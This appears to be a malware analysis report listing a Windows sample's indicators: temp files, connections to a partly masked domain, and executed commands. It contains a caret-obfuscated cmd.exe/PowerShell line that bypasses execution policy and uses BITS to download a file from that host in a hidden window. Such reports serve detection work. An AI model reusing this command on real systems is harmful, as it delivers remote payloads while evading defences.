Technical Information
- %TEMP%\ajcymbag.txt
- %WINDIR%\temp\cabe9f2.tmp
- %WINDIR%\temp\tare9f3.tmp
- %WINDIR%\temp\cab167f.tmp
- %WINDIR%\temp\tar1680.tmp
- %WINDIR%\temp\cab173c.tmp
- %WINDIR%\temp\tar173d.tmp
- %WINDIR%\temp\cab2cc1.tmp
- %WINDIR%\temp\tar2cc2.tmp
- %WINDIR%\temp\cab2ce3.tmp
- %WINDIR%\temp\tar2ce4.tmp
- %WINDIR%\temp\cab42a6.tmp
- %WINDIR%\temp\tar42a7.tmp
- %WINDIR%\temp\cabe9f2.tmp
- %WINDIR%\temp\tare9f3.tmp
- %WINDIR%\temp\cab167f.tmp
- %WINDIR%\temp\tar1680.tmp
- %WINDIR%\temp\cab173c.tmp
- %WINDIR%\temp\tar173d.tmp
- %WINDIR%\temp\cab2cc1.tmp
- %WINDIR%\temp\tar2cc2.tmp
- %WINDIR%\temp\cab2ce3.tmp
- %WINDIR%\temp\tar2ce4.tmp
- %WINDIR%\temp\cab42a6.tmp
- %WINDIR%\temp\tar42a7.tmp
- 'do###inka.cz':80
- 'do###inka.cz':443
- 'do###inka.cz':443
- DNS ASK do###inka.cz
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RSHell.^e^xe -EXeC^Ut^io^NPOlicy^ b^y^p^a^Ss iM^por^T^-^mODULe bItst^R^a^nSf^e^R;^star^t^-B^ItstrA^NSf^ER^ -Sour^cE 'http://do###inka.cz/tmp/2202.3545' -d^eS^tInaTIOn '%TEMP%\rad4F430...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /q /c "ver"
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RSHell.^e^xe -EXeC^Ut^io^NPOlicy^ b^y^p^a^Ss iM^por^T^-^mODULe bItst^R^a^nSf^e^R;^star^t^-B^ItstrA^NSf^ER^ -Sour^cE 'http://do###inka.cz/tmp/2202.3545' -d^eS^tInaTIOn '%TEMP%\rad4F430...